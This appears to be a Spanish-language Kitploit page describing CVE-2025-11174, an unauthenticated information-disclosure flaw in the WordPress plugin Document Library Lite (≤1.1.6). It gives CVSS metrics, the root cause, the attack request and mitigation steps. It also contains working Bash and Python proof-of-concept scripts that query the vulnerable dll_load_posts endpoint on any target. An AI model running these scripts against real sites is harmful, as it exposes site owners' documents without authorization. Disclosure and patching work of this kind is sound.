Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Falta de autorización para la exposición de información sensible | CVE-2025-11174 | Kitploit
Herramientas/GitHubGitHub/snailsploit/cve-2025-11174
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Falta de autorización para la exposición de información sensible | CVE-2025-11174

Ver Repositorio
4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-11174: Divulgación de Información no Autenticada en el Plugin Document Library Lite de WordPress

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Palabras clave: CVE-2025-11174, vulnerabilidad de Document Library Lite, divulgación de información, seguridad de WordPress, exploit AJAX no autenticado, vulnerabilidad de plugin de WordPress, CWE-862, seguridad de plugin de documentos de WordPress, bypass de autorización, WordPress CVE 2025

Tabla de Contenido

  • Visión general
  • Detalles de la Vulnerabilidad
  • Análisis Técnico
  • Vector de Ataque
  • Prueba de Concepto
  • Guía de Mitigación
  • Detección
  • Métricas CVSS
  • Referencias
  • Créditos
  • Contacto de Seguridad

Visión general

Vulnerabilidad de Divulgación de Información en el Plugin Document Library Lite de WordPress (CVE-2025-11174) - Fallo de seguridad que permite acceso no autenticado a datos sensibles de documentos en el plugin de biblioteca de documentos de WordPress.

Se descubrió una vulnerabilidad crítica de bypass de autorización en el Plugin Document Library Lite de WordPress que permite a atacantes no autenticados acceder a información sensible de documentos sin la autenticación adecuada.

Descubierto por: Kai Aizen y Avraham Shemesh (SnailSploit)
Publicado: 1 de noviembre de 2025
Puntuación CVSS: 5.3 (Medio)
CWE: CWE-862 - Autorización Faltante
Plugin: Document Library Lite
Vendedor: Barn2 Plugins
Tipo de Ataque: Divulgación de Información no Autenticada
Privilegios Requeridos: Ninguno (Ataque no Autenticado)

Detalles de la Vulnerabilidad

Descripción

El plugin Document Library Lite para WordPress contiene una vulnerabilidad de autorización incorrecta en todas las versiones hasta la 1.1.6 inclusive. El plugin expone una acción AJAX no autenticada dll_load_posts que devuelve una tabla JSON de datos de documentos sin realizar comprobaciones de nonce o capacidades.

Impacto

Esta vulnerabilidad permite a atacantes no autenticados:

  • Acceder a metadatos de documentos sin autorización
  • Recuperar listados de documentos que deberían estar restringidos
  • Ver información de documentos destinada solo a usuarios autenticados
  • Enumerar documentos almacenados en la Biblioteca de Documentos

Nota: La puntuación CVSS de 5.3 (severidad Media) refleja una divulgación limitada de información. Si bien la vulnerabilidad permite el acceso no autenticado a datos de documentos, el impacto se califica como Bajo en confidencialidad sin impacto en integridad ni disponibilidad.

Versiones Afectadas

  • Vulnerable: Todas las versiones ≤ 1.1.6
  • Parcheada: Versión 1.1.7 y superiores

Métricas CVSS v3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
MétricaValor
Vector de AtaqueRed (AV:N)
Complejidad del AtaqueBaja (AC:L)
Privilegios RequeridosNinguno (PR:N)
Interacción del UsuarioNinguna (UI:N)
AlcanceSin cambios (S:U)
ConfidencialidadBaja (C:L)
IntegridadNinguna (I:N)
DisponibilidadNinguna (A:N)

Desglose CVSS v3.1:

  • Vector de Ataque (AV): Red - La vulnerabilidad puede explotarse de forma remota a través de una red
  • Complejidad del Ataque (AC): Baja - No se requieren condiciones especiales para la explotación
  • Privilegios Requeridos (PR): Ninguno - No se requiere autenticación ni privilegios
  • Interacción del Usuario (UI): Ninguna - El exploit funciona sin interacción del usuario
  • Alcance (S): Sin cambios - La vulnerabilidad solo afecta al componente vulnerable
  • Impacto en Confidencialidad (C): Bajo - Divulgación limitada de información
  • Impacto en Integridad (I): Ninguno - Sin impacto en integridad
  • Impacto en Disponibilidad (A): Ninguno - Sin impacto en disponibilidad

Análisis Técnico

Causa Raíz de la Vulnerabilidad

La acción AJAX dll_load_posts está registrada sin las comprobaciones adecuadas de autenticación o autorización:

// Código vulnerable (simplificado)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

El prefijo wp_ajax_nopriv_ indica que esta acción es accesible para usuarios no autenticados, y la función callback no implementa:

  • Verificación de nonce
  • Comprobaciones de capacidades
  • Validación de autenticación de usuario

Vector de Ataque

POST /wp-admin/admin-ajax.php
action=dll_load_posts

La vulnerabilidad puede explotarse a través del endpoint admin-ajax.php de WordPress sin autenticación.

Prueba de Concepto

⚠️ Solo con Fines Educativos y de Pruebas Autorizadas

PoC en Bash

#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC en Python

#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Mitigación

Para Administradores del Sitio

Acción Inmediata Requerida:

  1. Actualice a la versión 1.1.7 o superior de Document Library Lite de inmediato
  2. Revise los registros de acceso de su sitio en busca de solicitudes POST sospechosas a admin-ajax.php con action=dll_load_posts
  3. Si no puede actualizar de inmediato, considere desactivar temporalmente el plugin

Instrucciones de Actualización

Descargar herramienta